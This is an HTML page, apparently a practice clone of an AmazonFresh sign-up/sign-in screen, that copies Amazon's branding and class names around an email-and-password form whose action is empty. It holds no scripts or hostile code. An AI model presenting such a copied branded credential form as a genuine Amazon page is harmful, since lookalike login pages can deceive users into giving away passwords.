<!DOCTYPE html>
<html>
<head>
    <link rel="shortcut icon" href="images/support_images/icons/favicon.ico" type="image/vnd.microsoft.icon">
    <link rel="icon" href="images/support_images/icons/favicon.ico" type="image/vnd.microsoft.icon">
    <title>Sign up | AmazonFresh</title>
    <link href="css/signin.css" rel="stylesheet">
    <link href="css/bootstrap.css" rel="stylesheet">
    <link href="css/_style.css" rel="stylesheet">

</head>
<body>

    <div id="a-page">
      <div class="row">
          <div class="col-md-12">
            <ul class="nav nav-pills navbar-fixed-top header-nav">
            <li>
                <a class="img-logo" href="/" id=""><img alt="AmazonFresh Home" src="images/support_images/af-logo-white.png"><span></span></a>
            </li>
            </ul>
          </div>
      </div>
      <div class="col-md-4"></div>
      <div class="col-md-4">

        <div class="a-section a-padding-medium auth-workflow container-fluid" style="margin-top: 100px;">
            <div class="a-section">
                <div class="a-section a-spacing-base auth-pagelet-container">
                    <div class="a-section">
                        <form action="" class="a-spacing-none" id="signIn" method="post" name="signIn" novalidate="">
                            <div class="a-section">
                                <div class="a-box">
                                    <div class="a-box-inner a-padding-extra-large">
                                        <h1 class="a-spacing-small">Sign Up</h1>
                                        <div class="a-row a-spacing-base">
                                            <label for="ap_email">Email ID</label>
                                            <input class="a-input-text a-span12 auth-autofocus auth-required-field"
                                            id="ap_email" maxlength="128" name="email" tabindex="1" type="email">
                                        </div>
                                        <div class="a-section a-spacing-large">
                                            <div class="a-row">
                                                <div class="a-column a-span5">
                                                    <label for="ap_password">Password</label>
                                                </div>
                                                <div class="a-column a-span7 a-text-right a-span-last">
                                                    <a class="a-spacing-null a-link-normal" href=
                                                    "/forgotPassword"
                                                    id="auth-fpp-link-bottom">Forgot your password?</a>
                                                </div>
                                            </div>
                                            <input class="a-input-text a-span12 auth-required-field" id="ap_password" name="password" tabindex="2" type="password">
                                        </div>
                                        <div class="a-section a-spacing-extra-large">
                                            <span class="a-button a-button-span12 a-button-primary" id="a-autoid-0"><span class="a-button-inner"><input aria-labelledby=
                                            "a-autoid-0-announce" class="a-button-input" id="signInSubmit" tabindex="5" type="submit"> <span aria-hidden="true" class=
                                            "a-button-text" id="a-autoid-0-announce">Sign in</span></span></span>
                                        </div>
                                        <div class="a-divider a-divider-break">
                                            <h5>New to Amazon?</h5>
                                        </div>
                                        <span class="a-button a-button-span12" id="auth-create-account-link">
                                          <span class="a-button-inner">
                                          <a class="a-button-text" href="/signUp" id="createAccountSubmit" role="button" tabindex="6">
                                            Create your Amazon account
                                          </a>
                                        </span>
                                      </span>
                                </div>
                            </div>
                          </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
      </div>
      <div class="col-md-4"></div>
    </div>

</body>
</html>
